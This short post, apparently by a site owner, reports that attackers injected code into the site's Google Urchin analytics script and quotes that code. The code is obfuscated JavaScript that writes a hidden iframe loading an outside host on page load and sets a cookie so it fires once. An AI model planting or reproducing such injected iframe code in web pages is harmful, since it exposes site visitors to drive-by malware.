Bastards injected the following code into Google’s Urchin JS block on one of the pages:
if (document.cookie.search("saokj=7") == -1) {
document.write("<"+"i"+"frame s"+"rc="+"http:/"+"/gcou"+"nt"+"er.c"+"n"+" s"+"tyle=display:none>"+"<"+"/ifra"+"me>");
document.cookie = "saokj=7;expires=Sun, 01-Dec-2009 08:00:00 GMT;path=/";}
I hope nobody got affected by this trick. It’s fixed now.